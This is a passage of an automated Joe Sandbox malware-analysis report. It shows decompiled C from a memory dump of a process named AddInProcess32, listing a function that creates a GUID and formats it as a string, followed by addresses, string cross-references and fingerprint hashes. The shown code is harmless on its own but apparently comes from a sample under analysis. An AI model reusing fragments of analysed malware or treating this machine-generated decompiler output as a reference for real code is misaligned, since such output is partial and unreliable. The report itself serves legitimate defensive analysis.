                                              				signed char _v525;
                                              				signed char _v526;
                                              				signed char _v527;
                                              				signed char _v528;
                                              				signed char _v529;
                                              				signed char _v530;
                                              				signed char _v531;
                                              				signed char _v532;
                                              				signed short _v534;
                                              				signed short _v536;
                                              				char _v540;
                                              				signed int _t19;
                                              				short* _t50;
                                              				signed int _t51;
                                              
                                              				_t19 =  *0x2b56004; // 0xbb40e64e
                                              				_v8 = _t19 ^ _t51;
                                              				_t50 = __ecx;
                                              				if(__ecx != 0) {
                                              					 *__ecx = 0;
                                              					E02B52CE7(0,  &_v540, 0x10);
                                              					__imp__CoCreateGuid( &_v540);
                                              					E02B52CE7( &_v540,  &_v524, 0x200);
                                              					wsprintfW( &_v524, L"{%08X-%04X-%04x-%02X%02X-%02X%02X%02X%02X%02X%02X}", _v540, _v536 & 0x0000ffff, _v534 & 0x0000ffff, _v532 & 0x000000ff, _v531 & 0x000000ff, _v530 & 0x000000ff, _v529 & 0x000000ff, _v528 & 0x000000ff, _v527 & 0x000000ff, _v526 & 0x000000ff, _v525 & 0x000000ff);
                                              					E02B52C9C(_t50,  &_v524);
                                              				}
                                              				return E02B53C33(_v8 ^ _t51);
                                              			}



















                                              0x02b528e3
                                              0x02b528ea
                                              0x02b528ee
                                              0x02b528f4
                                              0x02b52902
                                              0x02b52905
                                              0x02b52912
                                              0x02b52923
                                              0x02b5298a
                                              0x02b5299b
                                              0x02b529a2
                                              0x02b529b1

                                              APIs
                                              Strings
                                              • {%08X-%04X-%04x-%02X%02X-%02X%02X%02X%02X%02X%02X}, xrefs: 02B52984
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392656395.0000000002B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B50000, based on PE: true
                                              • Associated: 00000007.00000002.392656395.0000000002B56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000007.00000002.392656395.0000000002B5B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_2b50000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: CreateGuidwsprintf
                                              • String ID: {%08X-%04X-%04x-%02X%02X-%02X%02X%02X%02X%02X%02X}
                                              • API String ID: 543765187-891345449
                                              • Opcode ID: 1eb3797bb68ba2e66233865266c68aaeb14d14c1f0570a424897be2b9d3c0347
                                              • Instruction ID: 1a011aac4c8572908b03cb8673d54d70a0add09e4ee5b6f11c03a671819c2d26
                                              • Opcode Fuzzy Hash: 1eb3797bb68ba2e66233865266c68aaeb14d14c1f0570a424897be2b9d3c0347
                                              • Instruction Fuzzy Hash: FA117571D443BC6ECB719BA48C18BFAB7BC9F1D201F0405D5B9A9D6142DA388BC49F60
                                              Uniqueness

                                              Uniqueness Score: -1.00%